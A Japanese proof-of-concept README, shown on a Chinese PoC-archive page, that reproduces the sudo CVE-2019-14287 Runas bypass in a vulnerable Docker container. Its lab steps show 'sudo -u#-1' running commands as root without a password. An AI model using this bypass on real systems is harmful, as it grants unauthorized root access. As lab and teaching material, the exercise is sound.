关联漏洞
介绍
# PoC of CVE-2019-14287
## 概要
sudo の脆弱性 ([CVE-2019-14287](https://www.sudo.ws/security/advisories/minus_1_uid/)) を Docker コンテナ上で再現するサンプルです。
## 演習手順
1. `docker compose up -d` でコンテナを立ち上げる
1. `docker exec -it vulnerable_sudo_app bash` でコンテナに入る
1. `whoami`や `id`コマンドを実行して、自分が一般ユーザである(rootでない)ことを確認
```
$ whoami
user1
$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1)
$ id -u
1000
```
1. `sudo -u#0 whoami` や `sudo -u#0 id -u` が実行できないことを確認する
- uid (`-u` オプション) に 0 (root)を指定して実行する
- パスワードを求められるが、パスワードは知らないので実行できない
```
$ sudo -u#0 whoami
[sudo] password for user1:
$ sudo -u#0 id
[sudo] password for user1:
$ sudo -u#0 id -u
[sudo] password for user1:
```
1. `sudo -u#-1 whoami` や `sudo -u#-1 id -u` を実行して、認証なしで root としてコマンドが実行できることを確認する(脆弱性の再現)
- `-u#4294967295` でも同様のことができる
```
$ sudo -u#-1 whoami
root
$ sudo -u#-1 id
uid=0(root) gid=1000(user1) groups=1000(user1)
$ sudo -u#-1 id -u
0
```
## 参考
- [CVE \- CVE\-2019\-14287](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287)
- [Potential bypass of Runas user restrictions \| Sudo](https://www.sudo.ws/security/advisories/minus_1_uid/)
- [sudoの脆弱性\(CVE\-2019\-14287\)についてまとめてみた \- Qiita](https://qiita.com/task4233/items/80a5ea1c0b4f8e45db2e)
文件快照
[4.0K] /data/pocs/7767c99a9a0f46307fa742a2799064b7fb3b1ef3
├── [ 150] docker-compose.yml
├── [ 428] Dockerfile
└── [1.7K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。